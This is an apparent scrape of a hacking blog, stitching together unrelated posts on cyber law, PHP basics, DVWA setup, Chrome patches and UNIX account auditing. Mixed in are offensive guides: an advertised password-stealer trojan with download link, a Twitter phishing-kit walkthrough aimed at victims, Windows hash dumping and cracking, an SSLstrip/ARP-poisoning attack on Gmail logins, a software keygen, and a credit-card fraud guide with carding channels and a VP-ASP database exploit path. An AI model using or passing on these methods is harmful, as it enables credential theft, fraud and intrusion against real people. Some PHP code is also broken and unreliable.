Chor Police in Cyberspace

So lets begin a journey to explore the hugely unexplored avenues of a fancy world called the cyber space. Tell me how you would feel if you wake up and log into your Facebook account just to know if everybody else in this world has woken up or not, the same you have been doing religiously for months now. But today a bolt from the blue awaits you. You can’t access your account, some weird irritating error ‘Invalid user-name or password’ makes life difficult for you! I’m sure it would be frustrating not to be able to tell the world that you have woken up. But wait! The trouble may have just begun. What if some Tom, Dick or Harry, who hold some medieval era grudges against you has HACKED into your account and now has access to everything that you called ‘personal’? What if he tweaks your relationship status to ‘it’s complicated’? That would really piss off your girl. Wouldn’t it? What if he messages your Dad, ‘I wanna become a NAZI!!’? Well, I would suggest you find yourself some part-time job coz you’ll be short on pocket money for a few months now!

Hacking is just the tip of the iceberg. Cyber crimes go really deep and dark. From banking fraud to credit card information theft. From cyber terrorism to IPR violations. And yes, worm attacks and ahh… well… yeah… pornography! You would surely not like yourself pictured with Anna Nicole Smith with an advertising strip running below ‘Meet the new Bed Stars!’
Cyber crimes can be categorized as-
The computer as a target- using a computer to attack other computers.
Example- Hacking, Virus/Worm Attacks, DOS Attack etc.

The computer as a weapon- using a computer to commit real world crimes.
Example- Cyber Terrorism, IPR Violations, Credit Card Frauds, EFT Frauds, pornography etc.

To counter these Toms, Dicks  and Harrys; a league of good men have formulated some rules dictating the terms and conditions for human interaction with the cyber space, these rules have come to be called as ‘Cyber Laws’. Cyber law is a term used to describe the legal issues related to the use of communications technology, particularly cyber space i.e. The Internet!
Cyber laws are a desperate attempt to bring some order to the jungle raj of cyber space. And trust me; bringing order to chaos has never been that easy. It is a less distinct field of law in a way that property or contract are as it is an amalgamation of many legal fields, including intellectual property, privacy, freedom of expression and jurisdiction. In a gist, it’s an attempt to integrate the challenges presented by human activity on the internet with the legacy system of the laws.
So now you have a little idea about what you should and what you must not do on net, as it has been the thumb rule of nature, for every evil there is some good. In this way, for every crime there will be a law, it’s your responsibility to remain on the safe side of it.
Have I ignited any flame of excitement in you about the Cyber Laws? Would you like to know whats and hows of the Cyber Laws? Then stay hooked to this space, I’ll be back with more 

Advance PHP guide of |PHP Date | PHP Include | PHP File |

Before, I start And you start reading after my End, Let me tell you before you come to this post, You must know Basic of PHP Which includes, Knowing of Variables, Loops, arrays, Forms, GET & POST. If Yes, Than Chhers Let read this further to know more About PHP.

Index

1. PHP Date
2. PHP Include
3. PHP File
   

1). PHP Date

Format

PHP Code:

date(format,timestamp) 

"format" is parameter and it is Required.It Specifies the format of the timestamp.
"timestamp" is parameter and it is optional. Specifies a timestamp. Default is the current date and time

Time PHP Code "PHP Date()" - Format the Date

Click to View Example (Click to View)

PHP Date() - Adding a Timestamp



Format

PHP Code:

mktime(hour,minute,second,month,day,year,is_dst) 

Example

Click to View (Click to View)

You have Learn Date Function, Now Lets move on to

PHP include() & require() function

Let us first now feature of this function, this is time saving feature in short what it does, it calls up some file to execute by just writing the page name, and we don't have to write same code what we have written earlier. For E.g, If we need header in our all page than we can make one header file and will call that page by just writing header tag on every page, rather than typing again and again the header page content, Thats it, If you understood well and goo, if not dont reply here for this function

PHP include function

Examples will make you clear no more Clarification:-

Example (Click to View)

PHP require() Function

Now Let it make it shorter, just write "require" in place of "include" and you are done with require functio too.

Now, You must be thinking why two function for 1 purpose. Nah Nah, Not 1 feature,

Difference in "include()" & "require()" function is, :-

"include()" function executes the bottom line of statement if there is any error line above to it.
But "require()" function stops and does not proceed further, if there is any error in above lines of code/statement.

Rest they both are same.Now Lets move on to

PHP File

How to open a File

Format

PHP Code:

<html>
<body>

<?php
$file=fopen("welcome.txt","r");?>
</body>
</html> 

$file = variable and
fopen is function
with "welcome.txt" file name to open and
"r" to format of open, whether readable or writable or executable or two of any of them or all of them.

List of format of open, are

1). "r" = read only and this starts @ the beginning of file.
2). "r+" = read and write, starts @ beginning of file.
3). "w" = write only, Opens the file and clears it, if the filename doesnot exist than it will create it.
4). "w+" = write/read starts, Opens the file and clears it, if the filename doesnot exist than it will create it.
5). "a" = Append.Opens and writes to the end of the file or creates a new file if it doesn't exist.
6). "a+" = Read/Append. Preserves file content by writing to the end of the file.
7). "x" = Write only. Creates a new file. Returns FALSE and an error if file already exists.
8). "x+" = Read/Write. Creates a new file. Returns FALSE and an error if file already exists.

Example

Spoiler (Click to View)

Closing a file

PHP Code:

<?php
$file = fopen("test.txt","r");
//some code to be executed
fclose($file);?>

Check End-of-file

PHP Code:

if (feof($file)) echo "End of file"; 

Reading a File Line by Line

PHP Code:

<?php
$file = fopen("welcome.txt", "r") or exit("Unable to open file!");//Output a line of the file until the end is reachedwhile(!feof($file))
  {
  echo fgets($file). "<br />";
  }fclose($file);?>

while is loop here and (!feof($file)) means run the loop until you reach the end of line. [if not feof than echo, if feof than stop]

Reading a File Character by Character

PHP Code:

<?php
$file=fopen("welcome.txt","r") or exit("Unable to open file!");
while (!feof($file))
  {
  echo fgetc($file);
  }fclose($file);?>

This is for those who will copy my this thread

Spoiler (Click to View)

PHP Database ODBC or PHP Application Programming Interface | PHP API

ODBC is an Application Programming Interface (API) that allows you to connect to a data source (e.g. an MS Access database).

Create an ODBC Connection

With an ODBC connection, you can connect to any database, on any computer in your network, as long as an ODBC connection is available.

Here is how to create an ODBC connection to a MS Access Database:

1. Open the Administrative Tools icon in your Control Panel.
2. Double-click on the Data Sources (ODBC) icon inside.
3. Choose the System DSN tab.
4. Click on Add in the System DSN tab.
5. Select the Microsoft Access Driver. Click Finish.
6. In the next screen, click Select to locate the database.
7. Give the database a Data Source Name (DSN).
8. Click OK.

Connecting to an ODBC

The odbc_connect() function is used to connect to an ODBC data source. The function takes four parameters: the data source name, username, password, and an optional cursor type.The odbc_exec() function is used to execute an SQL statement.

Example :-

PHP Code:

$con= odbc_connect("WorldofHacker" ,"", "");$sql_query="SELECT * from USERNAME";$result= odbc_exec($con, $sql); 

How to fetch Records ?

Now as we have run the query & executed above, Now its time to fetch the query.
We have a simple command to fetch the query, it is

PHP Code:

odbc_fetch_rows($result) 

Retrieving Fields from a Record

The odbc_result() function is used to read fields from a record. This function takes two parameters: the ODBC result identifier and a field number or name.

Example

PHP Code:

$computername=odbc_result($result,1); 

The code line below returns the value of a field called "Username" :-

PHP Code:

$computername=odbc_result($result,"Username"); 

How to close ODBC Connection

The odbc_close() function is used to close an ODBC connection.

PHP Code:

odbc_close($con); 

Well, All the above were Basics Lets Complete with 1 good Example :-

PHP Code:

<html>
<body>

<?php
$con=odbc_connect("worldofhacker", "" ,"");
if (!$con)
{
exit ("connection failer: " .$con);
}
$sql_query= Select * from username;$query=odbc_exec($sql_query,$con);
if(!$query)
{
exit ("Error in SQL");
}

echo "<table><tr>";
echo "<th>Username</th>";
echo "<th>Contact name</th></tr>";
while (odbc_fetch_rows($query,$con)
{$computername=odbc_result($query,$con);$contactname=odbc_resule($query,$con);
echo "<tr><td>$conputername"</td>;
echo "<td>$contactname</td></tr>";
}odbc_close($con);
echo "</table>";?></body>
</html> 

Now you are done with all Basic Knowledge of PHP Application Programming Interface AKA "API".

UnLimited PASSWORD Stealer

Description: The UnLimited PW Stealer is a high-quality PW Stealer with the following characteristics:

Steal (- hack) the following accounts:
PW Messenger Packet:
MSN Messenger
Windows Messenger
Yahoo Messenger (Version 5.x und 6.x)
Google Talk
ICQ Lite 4.x/5.x/2003
AOL Instant Messenger/Netscape 7
Trilian
Miranda
GAIM

PW Mail Packet:
Outlook Express
Microsoft Outlook 2000/XP/2003
IncrediMail
Mozilla Thunderbird
Netscape 6.x/7.x
Group Mail Free, Gmail
Yahoo Mail
Hotmail / MSN Mail
Eudora

Protected Storage PW Packet:
Outlook Passwords
Auto Complete password in IE
Password protected sites in IE
MSN Explorer Passwords

Steam PW Packet:
Steam Username
Steam Password
Steam game-path

Game Key Stealer:
UT 2003/2004
Battlefield 1942 / Road to Rome / Scret Weapons / Vietnam
Need for Speed Hot Pursuit 2
James Bond 007 Nightfire
Command & Conquer Generals / Zero Hour
SimCity 4
Call of Duty 2 / United Offensive / 1
SWAT 4 / EXP

Windows Info Packet:
Windows Username, Windows Computername ect.

Other options are:
FTP Upload Information
Crypt the ploadfile PW Files
Crypt the FTP Settings
Melt Server (Self-Delete after Execute)
File Attribute on hidden set
Icon Changer
UPX Packer
…
And many more…

Quote:http://www.megaupload.com/?d=YK5QLJTI

How to transform Folder into Recycle Bin?

Hey there after a long time I have written this post so please if you find errors or problem then comment. So well start up How to transform Folder into Recycle Bin?

If you have already read the secret of hacking eBook than you must have known how to transform Folder to Recycle Bin Here I will teach you how to transform any folder into Recycle Bin...

Step 1- Open Notepad and Paste the following code into Notepad.

[.ShellClassInfo]

CLSID={645FF040-5081-101B-9F08-00AA002F954E}

Step 2- Now save the txt in Desktop.ini in the folder which you want to change into recycle bin here I have made hack folder in Drive D and saved the text.

Step 3- Open Command prompt (Start Menu >> Run >> Type cmd)

Step 4- Now type the Command d:\> attrib +a +r +s hack /s /d, which will convert the hack folder into recycle bin.

Now the Work is Done If you like this post or have problems then please comment I like to hear from you Guys and please share this Site to your friends my traffic is getting low.

How to create your Home Server?

In this tutorial I will teach you how to create a Server. Before, we get started I would like to tell you that do not copy any post from this Bog and post it on your Blog Even if you do then write the source from where you have copied.

So let get started.

Step 1- Download WAMP SERVER from http://www.wampserver.com and Install it in your computer.

Step 2- Now open the Wamp Server application.

Step 3- Now you will see an icon

Step 4- Now open your browser and type 127.0.0.1 or local host.

Learn Web Hacking with DVWA

Now many of you I think all want to learn hacking you read eBook and watch videos but what do you learn if you don’t use that knowledge on your practical work. If you hack a website than you may get caught so here in this tutorial I will tell you How to learn web hacking (with DVWA).

Before moving on first check that you have installed your server or not If you have not installed a Server in your PC than first read this “How to create your Home Server?” and come back.

Step 1- Download DVWA here.

Step 2-Now Extract the file and copy the file in folder. (If you don’t know how to copy files into server look the below step)

Step 3-Now go to DVWA and Enter the username “admin” and password “password”

If you don’t know how to copy the file to the server than don’t be sad I will teach you.

COPYING FILES INTO SERVER

Here I will teach you how to copy files into server. I will be using WAMP SERVER.

Step 1-Open Wamp application.

Step 2-You will see an icon  Click on that icon.

Step 3-Goto Apache >> Alias directories >> Add an alias

Step 4- Now a Command Prompt will open Type in the name you want here I will write hackerarpit

 

Step 5- Press Enter. Now it will ask the directory which is to be included. I have extracted my DVWA files in Drive c so I will write c:/dvwa

Step 6- Hit enter.

Steps 7- Now go to 127.0.0.1 or localhost in your browser Scroll down you will see hackerarpit folder as the picture below.

Step 8- Click there and a big login page will show up Type admin in username field and password in Password field and hit Enter.

Now start hacking.

How to compile C source code with Dev-C++?

In this tutorial I will teach you how to compile your C source code with the help of Dev-C++.

Today I have written many posts for the Blog so this one is also for you guys.

You can download Dev-C here. DOWNLOAD

So lets move with the tutorial.

We will be compiling a simple “Hello Ethical Hacker Tushar” Code in both in Dos mode.

Step 1- Open Dev-C and Click on File >> New >> Project

Step 2- Now a dialog box will appear Click on Console Application Icon and Choose C Project you can Name your file for less confusion Here I have named Hackerarpit.

Step 3-Click on OK Now a dialog box will appear asking where to save your project So create a New Folder and Save your file there.

Step 4-Now as you save a code will be displayed there Delete all the CODE.

Step 5- Copy the following code and paste it there.

#include<stdio.h>

main()

{

printf(“Hacker Arpit Dahal\n”);

system(“pause”);

}

Step 6- Press F9 or go to Execute >> Compile & Run

Step 7- Now a Command prompt will appear with the message Hacker Arpit Dahal.

Free PDF Editor: Hack Acrobat Adobe PDF Files

Here i will give you one PDF Editor for free. Nitro PDF Professional is one of the best PDF Editors on the market. It allows you to create, convert, edit, combine, secure, annotate, form-fill, and save 100% industry-standard PDF files… It worth to have!


Nitro PDF Professional is an affordable, fully-featured PDF creation and editing product. The professional application gives you full control over PDF documents, including creation, commenting, form-filling and authoring, digital signatures, text editing, one-click creation from Microsoft Office and more.

Features:

• Create PDF
• Edit PDF
• Convert PDF
• Review & annotate PDF
• PDF forms
• Secure PDF
• Assemble & combine PDF

How to install:

1. Download Nitro PDF Professional from here.

2. Extract it to your computer and install as usual software.

3. After open program and press activate (activate manually browse)


4. Run keygen.exe activation key , fill the installation id and get activation key and activate



Do you have questions, comments, or suggestions? Feel free to post a comment!

Hack Twitter

In this article i'm going to show you how to hack a Twitter Username and Password using phishing.


Now i know most of you already know what is phishing and how can it be used, but for those who don't know here is a short explanation.


It's simply like this... Phishing site is a exactly same page of the normal twitter login page. But when you enter your email and the password on login field, phishing sites save those login details, then the owner of the phishing site can login to your twitter account with your details later! The only way to recognize a phishing site is reading the address bar of the browser. It should be the normal twitter login URL. If you see something like

"www.newtwitter.com/login.php", "www.twitterbeta.com/login.php", etc.


Now before we start Please Note: Phishing is legally offensive. I am not responsible for any action done by you.

How to Hack Twitter Account Password?

1. First of all download Twitter Phisher from here.

2. The downloaded file contains:

• twitter.html
• twitter.php
• password.txt

3. Upload all of the files to any free webhost site like:

• www.yourfreehosting.net
• www.esmartstart.com
• www.110mb.com
• www.drivehq.com
• www.t35.com

4. Once you have uploaded the files in the directory, send this phisher link (twitter.html) to your victim and make him login to his Twitter account using your sent Phisher.

5. Once he logs in to his Twitter account using Phisher, all his typed Twitter id and password is stored in "password.txt".


6. Now, open password.txt to get hacked Twitter id and password as shown.


That's all. Simple, but effectively... Cheers

Qwiki: Awesome Wiki Tool That Talks. Learn By Watching, Listening

I came to know about this amazing online Wikipedia like “tool” that reads out the useful information about a topic or the searched item.

Whether you’re planning a vacation on the web, evaluating restaurants on your phone, or helping with homework in front of the family Google TV, Qwiki is working to deliver information in a format that’s quintessentially human – via storytelling instead of search.

Qwiki is Like a Future Encyclopaedia: Learn Visually

Link : Qwiki
What makes Qwiki so unique, apart from it behaving like a futuristic pc with voice with all the knowledge in the world, is the fact that it is a perfect wiki tool for your mobile device, tablet pc etc.
With graphs, maps, visual clips and speech this is surely now one my daily sites. If you are knowledge hungry you’ll find Qwiki your favourite companion. Plus it can be a great learning tool for your kids.

Qwiki Alarm Clock Prototype for Mobile Devices

Here’s something fun. a Qwiki-powered alarm clock for a smart Phone that was show at Techcrunch Disrupt.
http://vimeo.com/moogaloop.swf?clip_id=15829153&server=vimeo.com&show_title=1&show_byline=0&show_portrait=0&color=00ADEF&fullscreen=1&autoplay=0&loop=0
You can also check out the full product launch (video) of Qwiki at the first round of the TechCrunch Disrupt.
Think of asking your favourite teacher about Stonehenge, or your most well-travelled friend about Los Angeles: this is the experience Qwiki will eventually deliver, on demand, wherever you are in the world on whatever device you’re using.

Auditing Weak User Accounts On UNIX System

Whenever we talk about auditing weak user accounts on UNIX or UNIX like systems the very first thought that comes to mind is using John The Ripper or L0phtCrack to audit weak passwords.
This is very big misconception among most of the people that weak user accounts only means accounts with weak passwords.
A normal user account isn't that normal if you haven't edited any of the permissions for it. So lets see how many abnormal tasks a normal user can perform if his account is not properly audited. Lets start with creation of user account.
Usually we type following command to create a normal user in UNIX or UNIX like systems.

[root@localhost~]#useradd newuser
[root@localhost~]#passwd newuser

Now what's the problem with this user creation method.

Problem number 1: This user is not member of any group.
Problem number 2: This user will have his own folder in /home directory.

If a user is in shared network environment then it is mandatory that user must be a member of some group and he/she must not have primary group of his own. By creating user by above method you have given him two powers, power to own his own group and next power of having a separate folder. Here's how you should add a user to avoid above problems.

[root@localhost~]# useradd -d /home/group_name -g group_name newuser
[root@localhost~]#passwd newuser

-d: will set default folder for user to /home/group_name
-g: will add user to group_name as primary group member

Now what might be the scope of the user we created about using and accessing disk space and memory? The answer is unlimited. That means newuser can create as many files and folders he/she wants ultimately covering up all disk-space or alternatively he/she can write or run a program that consumes lot of memory, that means if he writes and executes a program which recursively increases its stack or just able to smash its own stack then a normal user can make complete system to crash down and stand still.
And his rights to access any folder can help him hide a script or program that he/she can use to escalate privileges later to become super user without anyone noticing it.

Above problems can be solved by activating disk quota on system. According to the UNIX or Linux system you are using refer its manual to see how to activate disk quota. Once activated you can set disk quota by typing following commands,

[root@localhost~]#set quota -u newuser abc / 8000 10000 400 500

The above command will set 10000 bytes for newuser in ' / ' partition and he/she will be warned if his/her disk usage goes above 8000 bytes. At maximum he/she can create 500 files with warning on 400th file. You can replace ' / ' with directory name where you want to restrict the user.
The next problem is how to restrict user's power to use unlimited memory access? To set restrictions open “/etc/security/limits.conf” file in VI editor or any familiar editor to you. The syntax of file is quite explanatory and will differ according to the version and base kernel of your system.

Last thing that is problematic is life of account. To check it out type following command,

[root@localhost~]#chage -l newuser

Now have a look on output you'll find account expires never, password expires never, days to change password 99999. Believe it or not this is default user account setting in every UNIX and Linux system. If you are smart enough then you can easily figure out how fatal this kind of account can prove to your system if this information is not changed. To change account permissions type

[root@localhost~]change newuser


and set permissions.

There are several steps involved in auditing a UNIX or UNIX like system depending for what system is configured but auditing weak user accounts for their permissions and passwords is common task in all no matter what your motive is. I know an experienced UNIX administrator will find this article is of little help whereas new administrators will find it useful. Anyways I hope RHA readers like this post, thanks for reading, happy hacking.

Types Of Server Sides Risks?

0diggsdigg

People require high security for internet. Most of people find it convenient to manage their bank accounts and business with the help of the internet. In such situation, the web security becomes the most important field in the network security. The interactive forms are written in HTML. Users type the information and send the request to the server to store the information by the user. 

The request launches a script on the server that processes the data supplied by the user but the result may be much unexpected which raises the need for server side security. URL Manipulation, unexpected user input, cross site scripting, buffer overflows and heap overruns are all famous known server side risks. All of these risks will be explained in this article. 

1. Conventional security

Conventionally, a firewall is placed between the web server and the internet so all the HTTP traffic reaching the web server will be secured. The firewall will allow only that traffic to the web server which fulfills all the requirements of the firewall. In this way, the web server can be saved from attacks to a great extent. 

2. URL Manipulation

In URL manipulation, some parameters of URL are changed to get different results. The user id present in the URL can be manipulated to get the access of the account of any other user. If * is placed at the place of user id, one can get the list of all the members listed in the data base. Input of any user can be accessed and manipulated present on the page which is the great threat to security and privacy. If there’s a site about Medifast and Nutrisystem coupons containing personal details of different users, then you can manipulate the URL to access personal details of other users.

3.  Unexpected User Input

When the server gets the unexpected user input, crashing of the server is the best reaction. Otherwise it will provide the control of the server to the attacker. The attacker may then use the server for whatever he wants to do. He can corrupt your database, download complete database and delete your database. If you don’t have a backup, what are you going to do?

4. Cross site scripting

In cross site scripting, attackers place malicious script on the trusted host’s end. The user may download that malicious script from the trusted host without realizing that this code is dangerous for the security. Sometimes, the server displays error page but due to malicious code, it may appear as a normal login page to the user. The user will enter the required information which can be misused as it will be sent to the attacker.

5. Buffer Overflow

The attackers may launch the attacks which results in access violation, instability and code injection. It may destruct the data stored in the database, causes the malfunctioning of software and many other destructive actions could be performed.

But what’s the solution then? You need to consider a few points to overcome the server side risks. Cryptography should be used to send the whole data in the query string. On the server side, the user input should be filtered and all the characters which are used in the scripting language should be removed.

How to Crack Windows Administrator Passwords

Some times it necessary to know admin passwords in schools ,collages to log in with admin privileges to do various things

There are many way to crack passwords. But in this tutorial I will explain a very basic method using a single tool to crack windows password . This might come handy in places like schools ,collages where you cant use your live Linux cds , usb ..etc because your being watched

Things we need :

1. Pwdump or Fgdump to extract password hashes

In this tutorial I will be using Pwdump

Extracting Password hashes :-

1. Open My computer and go to C:\Windows\system32 . now place the Pwdump file which we download earlier

2. Now open command prompt and navigate to C:\Windows\system32 \Pwdump

Using cd command and click enter

Example :-

Cd C:\Windows\system32 \Pwdump


3. Now you can see a list of Pwdump commands as shown

4. Now enter pwdump - localhost >>“ destination of output file “ (for 32 computers) and pwdump -x localhost >> “destination out put file “(for 64 bit computers )


Example :-

Cd C:\Windows\system32 \Pwdump localhost >> C:\hashes.txt

Cd C:\Windows\system32 \Pwdump -x localhost >> C:\hashes.txt

5. Now open  the Out put  file  you can see the names of the different  users with password hashes Now copy the hashes  corresponding to the admin account

Cracking The Hashes

Considering that we are in school/collage were we cant use tools to crack passwords so as an alternative we are using online password cracking sites

1. Go to online password cracking sites like www.cracker.offensive-security.com , www.onlinehashcrack.com and paste the hash select hash type as LM and click decode

2.By this way we are able to crack windows password using a single tool

Note:- If your not able to crack password hashes online use tools like john the ripper to crack password hashes . You can even copy the hashes and decoded it in your house

Man In The Middle Attack - SLL Hacking

One of the most successful way of gaining information such as passwords,user ids etc in LAN (local area network) is through man in the middle attacks . I will not be going to deep into Man in the middle attacks, but in simple words it can be explained as attacker or a hacker listening to all the information sent in between the client and the server .To prevent these kind of attacks Email providers started using Hypertext Transfer Protocol Secure (HTTPS) It is a combination of the Hypertext Transfer Protocol(HTTP) with SSL (Secure socket layer )protocol to provide encrypted communication between the client and the server .So when a hacker caries out a Mimt attack the victim is cautioned with a invalid SSL Certificate



In this tutorial I will teach how to carry out a successful Mitm attack

Concept :-

We Know that HTTP (Hypertext Transfer Protocol )simply sends all the information through plain text .So if we make the victim use HTTP instead of HTTPS to connect sites like Gmail , Pay pal. we will be able to carry out a successful Mitm attack with out causing any suspicion To do this we are going to use a tool called SSL strip

Read More: What is SSL(Secure Socket Layer)

Thing we Need

1. SSL strip: You can search Google for SSL strip it comes both in windows and Linux versions . I will be using the windows version in this tutorial

2. Ettercap to carry out mitm attacks

Demonstration :-

1. Open SSL strip and fill in all the required information for arpsoof, network ,ssl strip, change data .If you don’t know what to enter simply click auto check . remember to check if HTTPS to HTTP is included in Change data , finally click ok

2. Now select the victim’s IP and click open

3. Now open ettercap go to sniff -unsniffed sniffing and select your network interface and click ok

4. Now select hosts-scan hosts .Once scanning is completed .Open host list from hosts tab .Now select the IP address of the router as target 1 and the victims IP as target 2

5. Now select mitm-arp poisoning and click ok as shown

6. Finally select start-start sniffing .Now when the victim logs into gmail he will be using HTTP and not HTTPS Hence we are able to get the User id ,passwords as shown below

Counter measures:

1. whenever you perform an online transaction such as Credit card payment, Bank login or Email login always ensure that you Use HTTPS

2. Always check the SSL certificate before doing an online transaction

Convert Powerpoint Slides into Video to Share on Youtube

If you created a cool PowerPoint presentation you want to show and share…  then the best place will be the top video hosting site YouTube. The problem is, YouTube, only accepts videos or video clips from digital cameras, camcorders and cell phones that are in such format as WMV, AVI, MOV and MPEG.
How to Convert Powerpoint Presentations into Videos


Leawo PowerPoint to Video is a wonderful conversion program that assists in converting your PowerPoint presentation to quality video for uploading to video hosting websites like YouTube and playing on portable devices like iPhone, while retaining all the animations, transitions, sounds, webcam videos and internal hyperlinks in source PowerPoint.

• Download Free PowerPoint to Video : Click Here

The PPT to Video expert tool offers an innovative way for you to deliver anything made in PowerPoint, from Math homework to Makeup ads, from courseware to church sermons, fast and faithfully to the recipients via a video-welcome site.

• View Live Demo of Video, Created by This Software: View Video

Google Patches 19 Chrome Bugs Week Before Pwn2Own Hacking Contest

Google on Monday patched 19 vulnerabilities in Chrome, paying nine researchers $14,000 in bug bounties for reporting the flaws.
As it did last year, Google beefed up the security of its browser a week before the kickoff of Pwn2Own, the annual hacking contest held at the CanSecWest security conference in Vancouver, British Columbia.
The update to Chrome 9.0.597.107 fixed 16 flaws rated “high,” the second-most-severe ranking in Google’s threat system, and quashed three “medium” bugs.
None of the vulnerabilities were ranked “critical,” the category essentially reserved for bugs that may let an attacker escape Chrome’s anti-exploit “sandbox.” Google patched two sendbox-escape bugs both pegged critical — in Chrome this year.
The bugs patched Monday were in several components, including WebGL, the hardware accelerated 3D graphics API that debuted in early February with Chrome 9; SVG (scalable vector graphics) rendering and animation; and the browser’s address bar.
Nearly a quarter of the vulnerabilities were identified as “stale pointer” bugs, a term used to describe flaws in an application’s — in this case, Chrome’s — memory allocation code.
As is its practice google locked its bug tracking database to bar outsiders from viewing the technical details of the just-patched vulnerabilities. The company blocks public access to flaws for weeks or even months to give users time to update.
Google paid out $14,000, the second-highest total this year, for the 15 vulnerabilities found and reported by outside security researchers. Nine different researchers received checks, with Martin Barbella taking home $3,000, Sergey Radchenko $2,500 and two others $2,000 each.
Google and Mozilla, which makes Firefox, are the only browser developers to pay bounties directly to bug researchers.
In hindsight, Monday’s update should have been expected: In 2010.Google also patched Chrome the week before Pwn2Own.
2011′s Pwn2Own begins March 9, when security researchers will vie for fame and cash by trying to take down not just Chrome, but also the current versions of Apple’s Safari 5, Microsoft’s Internet Explorer 8 and Mozilla’s Firefox 3.6.
Monday’s patches could be particularly important this year, since Google has a special stake in Pwn2Own: It put up the $20,000 prize for hacking Chrome on the first of the contest’s three days. (After that, if no one breaks the browser, the rules change and Google will fork over just $10,000, with Pwn2Own sponsor HP TippingPoint ponying up the other $10,000.)
At least one other browser builder will issue patches before Pwn2Own’s first day of competition. Mozilla has scheduled a security update of Firefox 3.6 for later today.
The patched Chrome 9 can be downloaded for Windows, Mac OS X and Linux from Google’s Web site. Users already running the browser will be updated automatically.

Reiluke Tools Download Link

Here is a Collection of Reiluke Tools, Reiluke is a Password Hacking Tool.
Download them all at…
Link 1
or
Link 2
or
Link 3
or
Link 4
or
Mirrors: Link
Password: www.reiluke.i.ph

How to Send a Self Deleting SMS

In this post i will tell you how to send a self deleting SMS to any mobile that is automatically deleted after user reads it.
Basically this technique is called SAFE-TEXT. It’s a technique where a message destroys itself after being read. If you want to call it the Data-centric Suicide Message, that’s fine too. This is a website that allows you to send such type of sms for free of cost after registering on it. But it has limitation that you can send only 10 SMS a day.
So here’s the thing. With Wikileaks on one side and British libel law on the other, there’s room for a tool that lets you say what needs to be said, but without it falling into the wrong hands in the process.
What it does is allow you to send an expletive-laden opinion of your boss to a co-worker, or an it’s-in-the-public’s-interest-

to-know-this leak to your friend on the Guardian (or Wired), without it having a chance to be read by said boss, or unsaid MP.  Note: This trick should only work for British mobile network operators.
Here’s how to use it:

1. To register and activate, text WIRED to 83118 (charged at your standard network rate). You’ll be able to send up to 10 messages daily.
2. If you’re the sender, the message will show your name and number.
3. Write your libel-ridden hate speech and hit send.
4. The receiver will then be sent a text telling them they have been sent a Wired Safe Text with a link to the mobile internet site that hosts your message.
5. When they click through they will activate Safe Text. They will only have a few seconds to read the text (so don’t make it too long) before it self-destructs.

How to Hack a Credit Card

Hi there. This is my first serious “black hat hacking” post of credit cards hacking. Here will be explained all methods used to hack credit cards and bank accounts with lots of $$ it. Now I’m sure most of you think that this is fake or scam, but i want to just tell u this is real and the only working method (in my opinion) to hack a credit card and make your wish come true (lol, hope it doesn’t sound like a commercial).
This tutorial is divided in two parts.

1. Introduction into Credit Cards
2. Credit card Hacking

Note: Hacking credit cards is an illegal act, this is only informational post and I am not responsible for any actions done by you after reading this tutorial. This post is for educational purposes only.
Lets start with some easy terms.
What is credit card ?
Credit cards are of two types:

• Debit Card
• Credit Card

1. Debit means u have a sum of amount in it and u can use them.
2. Credit means u have a credit line limit like of $10000 and u can use them and by the end of month pay it to bank.
To use a credit card on internet u just not need cc number and expiry but u need many info like :

• First name
• Last name
• Address
• City
• State
• Zip
• Country
• Phone
• CC number
• Expiry
• CVV2 ( this is 3digit security code on backside after signature panel )

If you get that info you can use that to buy any thing on internet, like software license, porn site membership, proxy membership, or any thing (online services usually, like webhosting, domains).
If u want to make money $ through hacking then you need to be very lucky… you need to have a exact bank and bin to cash that credit card through ATM machines.
Let me explain how ?
First study some simple terms.
BINS = first 6 digit of every credit card is called ” BIN ” (for example cc number is : 4121638430101157 then its bin is ” 412163 “), i hope this is easy to understand.
Now the question is how to make money through credit cards. Its strange…, well you cant do that, but there is specific persons in world who can do that. They call them selves ” cashiers “. You can take some time to find a reliable cashiers.
Now the question is every bank credit cards are cashable and every bin is cashable? Like citibank, bank of america , mbna .. are all banks are cashables ? Well answer is ” NO “. If u know some thing, a little thing about banking system, have u ever heard what is ATM machines? Where u withdraw ur cash by putting ur card in.
Every bank don’t have ATM, every bank don’t support ATM machines cashout. Only few banks support with their few bins (as u know bin is first 6 digit of any credit / debit card number), for suppose bank of america. That bank not have only 1 bin, that bank is assigned like, 412345 412370 are ur bins u can make credit cards on them. So bank divide the country citi location wise, like from 412345 – 412360 is for americans, after that for outsiders and like this. I hope u understand. So all bins of the same bank are even not cashable, like for suppose they support ATM in New York and not in California, so like the bins of California of same bank will be uncashable. So always make sure that the bins and banks are 100% cashable in market by many cashiers.
Be sure cashiers are legit, because many cashiers r there which take your credit card and rip u off and don’t send your 50% share back.
You can also find some cashiers on mIRC *( /server irc.unixirc.net:6667 ) channel : #cashout, #ccpower
Well, check the website where u have list of bins and banks mostly 101% cashable. If u get the credit card of the same bank with same bin, then u can cashout otherwise not . Remember for using credit card on internet u don’t need PIN ( 4 words password which u enter in ATM Machine ), but for cashout u need. You can get pins only by 2nd method of hacking which i still not post but i will. First method of sql injection and shopadmin hacking don’t provide with pins, it only give cc numb cvv2 and other info which usually need for shopping not for cashing.
Credit Card Hacking
CC (Credit Cards) can be hacked by two ways:

• Credit Card Scams ( usually used for earning money , some times for shopping )
• Credit Card Shopadmin Hacking ( just for fun, knowledge, shopping on internet )

1. Shopadmin Hacking
This method is used for testing the knowledge or for getting the credit card for shopping on internet, or for fun, or any way but not for cashing ( because this method don’t give PIN – 4 digit passcode ) only gives cc numb , cvv2 and other basic info.
Shopadmins are of different companies, like: VP-ASP , X CART, etc. This tutorial is for hacking VP-ASP SHOP.
I hope u seen whenever u try to buy some thing on internet with cc, they show u a well programmed form, very secure. They are carts, like vp-asp xcarts. Specific sites are not hacked, but carts are hacked.
Below I’m posting tutorial to hack VP ASP cart. Now every site which use that cart can be hacked, and through their *mdb file u can get their clients ‘credit card details’, and also login name and password of their admin area, and all other info of clients and comapny secrets.
Lets start:
Type: VP-ASP Shopping Cart
Version: 5.00
How to find VP-ASP 5.00 sites?
Finding VP-ASP 5.00 sites is so simple…
1. Go to google.com and type: VP-ASP Shopping Cart 5.00
2. You will find many websites with VP-ASP 5.00 cart software installed
Now let’s go to the exploit..
The page will be like this: ****://***.victim.com/shop/shopdisplaycategories.asp
The exploit is: diag_dbtest.asp
Now you need to do this: ****://***.victim.com/shop/diag_dbtest.asp
A page will appear contain those:

• xDatabase
• shopping140
• xDblocation
• resx
• xdatabasetypexEmailxEmail NamexEmailSubjectxEmailSy stemxEmailTypexOrdernumbe r

